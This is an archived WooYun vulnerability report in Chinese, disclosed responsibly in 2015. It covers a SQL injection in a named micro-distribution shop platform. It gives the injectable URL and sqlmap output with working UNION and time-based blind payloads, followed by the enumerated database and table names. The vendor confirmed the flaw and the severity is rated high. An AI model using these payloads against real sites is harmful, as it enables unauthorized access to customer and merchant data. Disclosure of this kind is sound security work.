乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-27: 细节已通知厂商并且等待厂商处理中 2015-02-28: 厂商已经确认,细节仅向厂商公开 2015-03-10: 细节向核心白帽子及相关领域专家公开 2015-03-20: 细节向普通白帽子公开 2015-03-30: 细节向实习白帽子公开 2015-04-13: 细节向公众公开
启博科技旗下微分销平台存在SQL注入漏洞,有上千家微店使用此平台,致使大量信息泄露。
直接上注入点,http://m.wifenxiao.com/Item/detail/id/11849/sid/1005/pid/0.html此平台为伪静态系统,注入存在于id参数。
sqlmap identified the following injection points with a total of 107 HTTP(s) requests:---Place: URIParameter: #1* Type: UNION query Title: MySQL UNION query (NULL) - 19 columns Payload: http://m.wifenxiao.com:80/Item/detail/id/-3294) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716d6d7671,0x6245564566716c587659,0x71676b6671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#/sid/446/pid/0.html Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://m.wifenxiao.com:80/Item/detail/id/5750) AND SLEEP(5) AND (1633=1633/sid/446/pid/0.html---web application technology: Nginxback-end DBMS: MySQL 5.0.11available databases [6]:[*] information_schema[*] micro_fenxiao[*] mysql[*] performance_schema[*] test[*] www_wifenxiao_comDatabase: micro_fenxiao[94 tables]+---------------------------+| tp_1688 || tp_account || tp_acp_config || tp_admin || tp_admin_group || tp_agent || tp_agent_apply || tp_agent_rank || tp_ali1688_category || tp_api_client || tp_apply_withdraw_deposit || tp_area || tp_auto_reply || tp_cart || tp_category || tp_category_img || tp_category_magazine || tp_checkin_rule || tp_city || tp_code || tp_collection || tp_commission_log || tp_commission_rank || tp_complain_item || tp_complain_order || tp_config || tp_country || tp_coupon || tp_custom_module || tp_file || tp_follow || tp_freight_tpl || tp_game || tp_game_prize || tp_gift || tp_group || tp_item || tp_item_group || tp_item_message || tp_magazine || tp_magazine_category || tp_mass_send || tp_mass_send_view || tp_material_content || tp_material_more || tp_material_one || tp_message || tp_message_user || tp_order || tp_order_del_log || tp_order_import_log || tp_order_item || tp_order_show || tp_page_design || tp_point_log || tp_property || tp_property_value || tp_province || tp_province_freight || tp_pub_weixin || tp_pub_weixin_user || tp_pv || tp_qfx_shop || tp_rank_privilege || tp_seller || tp_shipping_print_item || tp_shipping_print_set || tp_shop || tp_shop_balance || tp_sku || tp_sms_recharge_pro || tp_sms_recharge_record || tp_sms_record || tp_stores || tp_system_call || tp_taobao_props || tp_tb_cat || tp_tb_property || tp_tb_property_value || tp_tb_shop || tp_template || tp_user || tp_user_account || tp_user_address || tp_user_balance || tp_user_checkin || tp_user_checkin_rule || tp_user_coupon || tp_user_game || tp_user_gift || tp_user_group || tp_user_rank || tp_version || tp_visit_log |+---------------------------+Database: www_wifenxiao_com[22 tables]+---------------------+| wi_address_area || wi_address_city || wi_address_province || wi_article_content || wi_article_sort || wi_column || wi_column_banner || wi_column_user || wi_config || wi_config_user || wi_domain || wi_down_content || wi_down_sort || wi_job_content || wi_link_content || wi_link_sort || wi_logs || wi_online || wi_pic_content || wi_pic_sort || wi_users || wi_users_group |+---------------------+
跑了部分表名出来。。。就不再继续了
新年快乐,来点小礼物可好?
危害等级:高
漏洞Rank:10
确认时间:2015-02-28 09:17
感谢您的帮助,我们会及时修复!
暂无
